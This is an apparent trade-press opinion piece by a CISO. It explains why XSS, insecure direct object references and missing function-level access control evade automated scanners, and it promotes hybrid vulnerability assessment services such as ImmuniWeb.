OWASP top 10 lists several other vulnerability classes that are difficult to detect with automated scanners. Cross-Site Scripting (XSS) is one of those. Attackers may use this technique to hijack user sessions and redirect them to a malicious site where users maybe tricked to enter their credentials or payment details. OWASP highlights that it is particularly difficult to detect XSS vulnerabilities using automated scanners on websites based on technologies such as Ajax.
One of the CISOs' nightmares is a potential ruin of corporate reputation. Imagine a web page with the corporate logo at the top and usual legal disclaimers at the bottom, and data input dialog boxes asking visitors to enter their login IDs and passwords. All that with the company's valid Internet address in the address bar. The main issue is that the prompt for user credentials is not passing that information to the corporate web application but to a malicious site. It is very unlikely that website visitors would inspect page source code to identify potential risk before entering their credentials.
Thousands of cases were published with such exploits. For example, 860,000 Apple fan accounts were compromised as a result of an XSS exploit on the MacRumors forum. With limited in-house manpower it is difficult for me to dedicate resources for continuous assessment of such a risk on all corporate web-based system. To compensate such restriction I ensure that most of web-based systems are included in continuous security assessment using hybrid scanners.
Insecure Direct Object References are vulnerabilities that may allow users authorized to access certain data to modify search parameters and access restricted data. Automated scanners cannot differentiate what is safe from what is unsafe.
A human penetration tester may identify a potential vulnerability that could lead to a data confidentiality breach. This kind of vulnerability sometimes slips through security tests even for large companies and results in privacy breach of 100,000 customersix. Missing Function Level Access Control is a similar type of vulnerability also related to the application logic and therefore unlikely to be identified by automated scanners. Instead of providing unauthorized access to data directly this vulnerability allows accessing application function that is not authorized for the current user's role.
An example for the small online shopping website could be getting access to the reimbursement approval function. Implementing a change in application logic to mitigate such a vulnerability should follow secure software development life-cycle best practice which recommends performing security assessment after every major change. It is not uncommon that fixing one vulnerability creates another one. Critical Java vulnerabilities discovered last year were repaired by an out-of-band patch that introduced new vulnerabilities. If CISOs have budget for another penetration test after the implementation of a remedy and before putting the web system back to production, they would sleep much better at night. With hybrid vulnerability assessment, initially introduced to the market by Swiss company High-Tech Bridge with ImmuniWeb SaaS, this finally seems feasible.
Sign up for CIO Asia eNewsletters.